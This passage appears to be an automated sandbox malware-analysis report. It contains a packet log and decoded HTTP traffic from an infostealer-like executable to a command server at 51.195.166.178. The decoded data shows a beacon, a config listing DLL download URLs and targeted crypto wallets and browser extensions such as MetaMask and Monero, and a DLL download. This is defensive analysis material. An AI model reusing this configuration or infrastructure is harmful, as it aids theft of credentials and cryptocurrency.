Aug 5, 2022 13:54:24.256921053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.256926060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.256942987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.256973028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.257507086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.257752895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.257801056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.258260965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.258310080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.258318901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.258373022 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.270601034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270631075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270653963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270682096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270724058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270766020 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.270781994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270790100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.270817041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270848989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.270920992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.270931005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270953894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270977974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.270988941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.271003008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.271008015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.271027088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.271040916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.271060944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.271080017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.272351980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.272448063 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276093006 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276128054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276159048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276191950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276192904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276213884 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276226044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276257992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276262999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276290894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276293039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276321888 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276325941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276350021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276355982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276379108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276387930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276408911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276422024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276436090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276453972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276479006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276489973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276510954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276521921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276545048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276554108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276577950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276587009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276607037 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276618958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276640892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276652098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276669979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276684046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276706934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276715994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276736975 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276750088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276766062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276781082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276808023 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276813030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276838064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276845932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276876926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276885986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276909113 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276910067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276940107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276942968 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276957989 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.276979923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.276999950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277014017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277034998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277045012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277070045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277077913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277111053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277117014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277143002 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277147055 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277153969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277174950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277195930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277206898 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277230978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277240038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277259111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277271986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277296066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277302980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277327061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277333975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277354956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277367115 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277385950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277396917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277420044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277430058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277451038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277461052 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277487040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277493954 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277514935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277528048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277549028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277559042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277581930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277592897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277616024 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277625084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277646065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277657032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277678967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277687073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.277710915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.277740955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.381788015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.382066965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:25.544966936 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:25.545033932 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:25.574536085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:25.574583054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:25.574610949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:25.613869905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:25.621562004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:25.621726036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:26.529094934 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:26.558655977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:26.601373911 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:26.601496935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.059319019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.059390068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.088655949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.088778019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.088824034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.088840008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.088851929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.088865995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.088880062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.123226881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.125646114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.133527040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.133716106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.162956953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.162977934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.163193941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.193248034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.193907976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.198246002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.199318886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:28.228713036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.228734970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.258095026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:28.260108948 CEST	49778	80	192.168.2.4	51.195.166.178

HTTP Request Dependency Graph

51.195.166.178

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49778	51.195.166.178	80	C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 13:54:12.723336935 CEST	1239	OUT	POST / HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: mozzzzzzzzzzz Host: 51.195.166.178 Content-Length: 94 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a\|user&configId=517bb0d640c1242c3f069aab3d1018d6
Aug 5, 2022 13:54:12.825297117 CEST	1241	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 5278 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"149e-TUdOV6RAkxaWAE5TjHnQPtGZ6P4" Data Raw: 6c 69 62 73 5f 6e 73 73 33 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6e 73 73 33 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 73 76 63 70 31 34 30 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 73 76 63 70 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 76 63 72 75 6e 74 69 6d 65 31 34 30 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 0a 6c 69 62 73 5f 6d 6f 7a 67 6c 75 65 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 Data Ascii: libs_nss3:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dlllibs_msvcp140:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlllibs_vcruntime140:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dlllibs_mozglue:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4
Aug 5, 2022 13:54:12.825330973 CEST	1242	IN	Data Raw: 65 52 38 66 45 31 78 50 37 68 4c 32 76 4b 2f 6d 6f 7a 67 6c 75 65 2e 64 6c 6c 0a 6c 69 62 73 5f 66 72 65 65 62 6c 33 3a 68 74 74 70 3a 2f 2f 35 31 2e 31 39 35 2e 31 36 36 2e 31 37 38 2f 61 4e 37 6a 44 30 71 4f 36 6b 54 35 62 4b 35 62 51 34 65 52 Data Ascii: eR8fE1xP7hL2vK/mozglue.dlllibs_freebl3:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dlllibs_softokn3:http://51.195.166.178/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dllews_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;L
Aug 5, 2022 13:54:12.825359106 CEST	1243	IN	Data Raw: 73 73 74 6d 6e 66 6f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 2e 74 78 74 3a 53 79 73 74 65 6d 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 0a 7c 49 6e 73 74 61 6c 6c 65 64 20 61 70 70 6c 69 63 61 74 69 6f 6e 73 3a 0a 7c 0a 77 6c 74 73 5f 64 61 65 64 61 Data Ascii: sstmnfo_System Info.txt:System Information: \|Installed applications:\|wlts_daedalus:Daedalus;26;Daedalus Mainnet;;log,cache,chain,dictionarwlts_mymonero:MyMonero;26;MyMonero;;cachewlts_xmr:Monero;5;Monero\\wallets;.keys;-wlts_wasa
Aug 5, 2022 13:54:12.825387001 CEST	1245	IN	Data Raw: 67 73 0a 65 77 73 5f 63 6c 6f 76 65 72 3a 6e 68 6e 6b 62 6b 67 6a 69 6b 67 63 69 67 61 64 6f 6d 6b 70 68 61 6c 61 6e 6e 64 63 61 70 6a 6b 3b 43 6c 6f 76 65 72 57 61 6c 6c 65 74 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e Data Ascii: gsews_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settingsews_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settingsews_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Set
Aug 5, 2022 13:54:12.825413942 CEST	1246	IN	Data Raw: 6f 6e 5f 65 78 3a 6e 70 68 70 6c 70 67 6f 61 6b 68 68 6a 63 68 6b 6b 68 6d 69 67 67 61 6b 69 6a 6e 6b 68 66 6e 64 3b 54 4f 4e 3b 4c 6f 63 61 6c 20 45 78 74 65 6e 73 69 6f 6e 20 53 65 74 74 69 6e 67 73 0a 65 77 73 5f 43 6f 73 6d 6f 73 74 61 74 69 Data Ascii: on_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settingsews_Cosmostation:fpkhgmpbidmiogeglndfbkegfdlnajnf;Cosmostation;Local Extension Settingsews_bitkeep:jiidiaalihmmhddjgbnbgdfflelocpak;BitKeep;Local Extension Settingsews_games
Aug 5, 2022 13:54:13.039436102 CEST	1246	OUT	GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1 Content-Type: text/plain; User-Agent: record Host: 51.195.166.178 Connection: Keep-Alive Cache-Control: no-cache
Aug 5, 2022 13:54:13.091945887 CEST	1248	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:13 GMT Content-Type: application/octet-stream Content-Length: 2042296 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT ETag: "62543db4-1f29b8" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 53 57 56 8b 5d 0c 8b 75 08 8b 7e 0c 85 ff 74 40 8b 0d 70 e0 1d 10 ff 15 00 30 1e 10 57 ff d1 83 c4 04 8b 7e 0c 31 c0 85 db 0f Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL9b"!&`@A!\T@@xPhh\!@.texti `.rdata@@.dataN*@.00cfg0@@.rsrcx@@@.relochP@BUSWV]u~t@p0W~1
Aug 5, 2022 13:54:13.091986895 CEST	1249	IN	Data Raw: 94 c0 c1 e0 08 48 89 46 44 85 ff 74 12 8b 0d 78 e0 1d 10 ff 15 00 30 1e 10 57 ff d1 83 c4 04 31 c0 5e 5f 5b 5d c3 31 c0 85 db 0f 94 c0 c1 e0 08 48 89 46 44 eb e9 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 57 56 83 ec 10 8b 75 08 81 fe 33 27 Data Ascii: HFDtx0W1^_[]1HFDUWVu3'u7=tal$`t:x(p,@0^_]~28wm$x($I"oOI&
Aug 5, 2022 13:54:13.092000008 CEST	1250	IN	Data Raw: ec b9 20 00 00 00 2b 4b 08 31 ff 89 4d e8 8b 03 8b 34 b8 85 f6 75 0b 47 89 f8 d3 e8 85 c0 74 ee eb 27 8b 1e 8b 45 f0 8b 48 0c ff 15 00 30 1e 10 6a 01 56 ff 75 ec ff d1 8b 4d e8 83 c4 0c 89 de 85 db 8b 5d 08 74 d0 eb d9 8b 7d f0 8b 4f 04 8b 33 ff Data Ascii: +K1M4uGt'EH0jVuM]t}O30VuVO0SV^_[]U}uu]Uu]UVEMUjuVPu^]USWV
Aug 5, 2022 13:54:13.092009068 CEST	1252	IN	Data Raw: 83 e1 db 09 c1 89 4c 1a 14 8b 44 1e 14 83 e0 10 83 e1 eb 09 c1 89 4c 1a 14 8b 44 1e 18 89 44 1a 18 8b 45 d4 40 83 c3 14 3b 06 8b 4d ec 0f 8c 6a ff ff ff e9 28 fe ff ff 57 e8 2d d3 19 00 83 c4 04 89 c2 42 8b 4d ec 85 c9 89 7d e4 89 55 d8 0f 84 32 Data Ascii: LDLDDE@;Mj(W-BM}U2E9w"wpPt\P83(yS<jU%uuWULu6HuDu<@
